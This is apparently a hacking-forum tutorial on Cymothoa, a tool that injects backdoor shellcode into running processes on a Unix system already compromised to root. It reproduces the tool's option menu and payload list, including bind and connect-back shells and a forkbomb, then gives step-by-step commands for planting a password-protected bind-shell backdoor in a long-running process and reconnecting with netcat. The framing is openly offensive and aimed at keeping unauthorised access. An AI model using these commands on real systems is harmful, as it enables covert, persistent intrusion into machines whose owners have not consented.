[LEGITimacy™]

Cymothoa is a stealth backdooring tool, that inject backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect them.

DOWNLOAD LINK:
CYMOTHOA

So lets say we just gained access to a unix system and we are now root on that system. But in the middle of our jumping and screaming for joy we think, "OHH SHIT!! HOW AM I GOING TO KEEP ACCESS??!!! " well one you could just go with the fine and dandy root kit, but lets say we want something different. Cymothoa is the tool for the job. Very easy to use and stealthy as hell, and with its newest version can pretty much create a persistent backdoor! So we go ahead and install Cymothoa on the exploited system and begin to make our OS Backdoor. First lets take a look at some of Cymothoa's options.


MENU:

Usage:
cymothoa -p <pid> -s <shellcode_number> [options]

Main options:
-p process pid
-s shellcode number
-l memory region name for shellcode injection (default /lib/ld)
search for "r-xp" permissions, see /proc/pid/maps...
-m memory region name for persistent memory (default /lib/ld)
search for "rw-p" permissions, see /proc/pid/maps...
-h print this help screen
-S list available shellcodes

Injection options (overwrite payload flags):
-f fork parent process
-F don't fork parent process
-b create payload thread (probably you need also -F)
-B don't create payload thread
-w pass persistent memory address
-W don't pass persistent memory address
-a use alarm scheduler
-A don't use alarm scheduler
-t use setitimer scheduler
-T don't use setitimer scheduler

Payload arguments:
-j set timer (seconds)
-k set timer (microseconds)
-x set the IP
-y set the port number
-r set the port number 2
-z set the username (4 bytes)
-o set the password (8 bytes)
-c set the script code (ex: "#!/bin/sh\nls; exit 0")
escape codes will not be interpreted..



Well this tool couldnt get any easier to use. So once uploaded and installed lets do some recon and find a nice process to infect.


[root@localhost cymothoa]# ps -ax


COMMAND WILL LIST PROCESSES, FIND ONE THAT MOST LIKELY WILL ALWAYS BE RUNNING!


Okay once thats done lets look at some of the payloads cymothoa gives us:



[root@localhost cymothoa]#cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (see the payload), creates a tmp file you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
11 - POC alarm() scheduled shellcode
12 - POC setitimer() scheduled shellcode
13 - alarm() backdoor (requires -j -y) bind port, fork on accept
14 - setitimer() tail follow (requires -k -x -y) send data via upd


THIS REPRESENTS THE SHELL CODE NUMBER IN THE USAGE MENU!


So lets Backdoor this bitch!!! :>



[root@localhost cymothoa]# cymothoa -p 40 -s 0 -y 2012

command above have meaning that we use the shell number 0 and inject the process with PID 40 in port 2012


Or lets get tricky with it and add a user and pass:


[root@localhost cymothoa]# cymothoa -p 40 -s 0 -y 2012 -z LEGITimacy -o HackCommunity


And there you go. Nmap the target system and make sure the port is up. Then just netcat to the open port give your user and pass, and your back into the system :yeye: Thanks for viewing my thread!